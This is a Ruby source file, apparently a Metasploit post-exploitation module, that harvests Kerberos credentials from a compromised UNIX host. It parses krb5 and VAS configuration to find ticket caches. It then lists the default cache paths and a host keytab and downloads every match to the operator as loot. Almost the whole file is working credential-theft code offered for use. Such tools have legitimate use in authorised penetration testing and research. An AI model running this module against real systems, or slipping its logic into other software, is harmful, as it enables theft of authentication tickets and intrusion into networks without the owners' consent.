1
# Copyright (c) 2015-2018, Cisco International Ltd
2
#
3
# Redistribution and use in source and binary forms, with or without
4
# modification, are permitted provided that the following conditions are met:
5
#     * Redistributions of source code must retain the above copyright
6
#       notice, this list of conditions and the following disclaimer.
7
#     * Redistributions in binary form must reproduce the above copyright
8
#       notice, this list of conditions and the following disclaimer in the
9
#       documentation and/or other materials provided with the distribution.
10
#     * Neither the name of the Cisco International Ltd nor the
11
#       names of its contributors may be used to endorse or promote products
12
#       derived from this software without specific prior written permission.
13
#
14
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
15
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
16
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
17
# DISCLAIMED. IN NO EVENT SHALL CISCO INTERNATIONAL LTD BE LIABLE FOR ANY
18
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
19
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
20
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
21
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
22
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
23
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
24
##
25
# This module requires Metasploit: https://metasploit.com/download
26
# Current source: https://github.com/rapid7/metasploit-framework
27
##
28

29
require 'shellwords'
30

31
class MetasploitModule < Msf::Post
32
  include Msf::Post::File
33
  include Msf::Post::Unix
34
  include Msf::Post::Common
35

36
  def initialize(info = {})
37
    super(
38
      update_info(
39
        info,
40
        'Name' => 'UNIX Gather Kerberos Tickets',
41
        'Description' => %q{ Post Module to obtain all kerberos tickets on the targeted UNIX machine. },
42
        'License' => MSF_LICENSE,
43
        'Author' => [ 'Tim Brown <timb[at]nth-dimension.org.uk>'],
44
        'Platform' => %w[linux osx unix solaris aix],
45
        'SessionTypes' => [ 'meterpreter', 'shell' ],
46
        'Notes' => {
47
          'Stability' => [CRASH_SAFE],
48
          'SideEffects' => [IOC_IN_LOGS],
49
          'Reliability' => []
50
        },
51
        'References' => [
52
          ['ATT&CK', Mitre::Attack::Technique::T1558_STEAL_OR_FORGE_KERBEROS_TICKETS],
53
          ['ATT&CK', Mitre::Attack::Technique::T1005_DATA_FROM_LOCAL_SYSTEM]
54
        ]
55
      )
56
    )
57
    register_options([
58
      OptString.new('KRB_CONFIG_FILE', [true, 'The Kerberos config file.', '/etc/krb5.conf']),
59
      OptString.new('VAS_CONFIG_FILE', [true, 'The VASD config file.', '/etc/opt/quest/vas/vas.conf']),
60
    ])
61
  end
62

63
  def run
64
    print_status('Finding files')
65
    files = [ '/etc/opt/quest/vas/host.keytab' ]
66
    configs = [datastore['KRB_CONFIG_FILE'], datastore['VAS_CONFIG_FILE']]
67
    configs.each do |config_file|
68
      if file? config_file
69
        config = read_file(config_file)
70
        if /\n\s*default_ccache_name\s*=\s*(?<cache_location>.*?)\s*\n/ =~ config || /\n\s*default_cc_name\s*=\s*(?<cache_location>.*?)\s*\n/ =~ config
71
          if /^FILE:(?<file_pattern>.*%\{uid\}.*)/ =~ cache_location
72
            suffix = ''
73
          elsif /^DIR:(?<file_pattern>.*%\{uid\}.*)/ =~ cache_location
74
            suffix = '/*'
75
          elsif /^(?<storage>KEYRING|API|KCM|MEMORY|KSLSA):/ =~ cache_location
76
            print_error("Kerberos ticket cache uses #{storage}. This module does not support this storage type.")
77
          else
78
            print_error("Unknown storage type: #{cache_location}")
79
          end
80

81
          if file_pattern
82
            print_status("Kerberos tickets configured to be stored at #{file_pattern}")
83
            placeholder = 'MSF_INSERT_HERE'
84
            # The krb5 pattern uses %{uid} as a wildcard. This is misinterpreted by Rubocop as a format string token
85
            # rubocop: disable Style/FormatStringToken
86
            file_pattern['%{uid}'] = placeholder
87
            # rubocop: enable Style/FormatStringToken
88
            # Need to do this two-step thing so Shellwords.escape doesn't escape the asterisk
89
            file_pattern = Shellwords.escape(file_pattern)
90
            file_pattern[placeholder] = '*'
91
            files += cmd_exec("ls #{file_pattern}#{suffix}").split(/\r\n|\r|\n/)
92
          end
93
        end
94
      else
95
        vprint_warning("Could not find #{config_file}")
96
      end
97
    end
98
    files += cmd_exec('ls /var/lib/sss/db/ccache_*').split(/\r\n|\r|\n/)
99
    # Even though our config check should preclude this, it is a default location, so checking it may find something
100
    files += cmd_exec('ls /tmp/krb5*').split(/\r\n|\r|\n/)
101
    files = files.uniq
102
    files = files.select { |d| file?(d) }
103
    if files.nil? || files.empty?
104
      print_error('No kerberos tickets found')
105
      return
106
    end
107
    download_loot(files)
108
  end
109

110
  def download_loot(files)
111
    print_status("Looting #{files.count} files")
112
    files.each do |file|
113
      file.chomp!
114
      sep = '/'
115
      print_status("Downloading #{file}")
116
      data = read_file(file)
117
      file = file.split(sep).last
118
      loot_file = store_loot('unix_kerberos_tickets', 'application/octet-stream', session, data, "unix_kerberos_tickets_#{file}", 'Kerberos Tickets File')
119
      print_good("File stored in: #{loot_file}")
120
    end
121
  end
122
end
123

124